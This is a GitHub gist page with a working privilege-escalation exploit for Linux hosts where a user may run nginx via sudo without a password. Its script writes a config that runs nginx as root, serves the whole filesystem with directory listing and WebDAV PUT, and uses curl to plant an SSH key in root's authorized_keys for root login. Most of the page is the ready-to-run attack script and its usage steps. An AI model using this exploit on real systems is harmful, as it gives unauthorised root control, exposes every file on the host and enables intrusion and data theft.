Skip to content

Instantly share code, notes, and snippets.

@DylanGrl

DylanGrl/nginx_privesc_sudo.md

Last active January 13, 2024 22:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save DylanGrl/ab497e2f01c7d672a80ab9561a903406 to your computer and use it in GitHub Desktop.
Save DylanGrl/ab497e2f01c7d672a80ab9561a903406 to your computer and use it in GitHub Desktop.
Download ZIP
nginx privilege escalation - SUDO
Raw
nginx_privesc_sudo.md

Privilege Escalation - NGINX / SUDO

Condition - You must have sudo permission on nginx:

user@host:~$ sudo -l
Matching Defaults entries for user on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User user may run the following commands on host:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx

From an existing interractive session create the following exploit code:

echo "[+] Creating configuration..."
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
	server {
	        listen 1339;
	        root /;
	        autoindex on;
	        dav_methods PUT;
	}
}
EOF
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Generating SSH Key..."
ssh-keygen
echo "[+] Display SSH Private Key for copy..."
cat .ssh/id_rsa
echo "[+] Add key to root user..."
curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat .ssh/id_rsa.pub)"
echo "[+] Use the SSH key to get access"

Then run the exploit:

./exploit.sh

Store the SSH Private Key then use it to connect to the host:

chmod 600 root_key
ssh -i root_key root@host

Credit

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment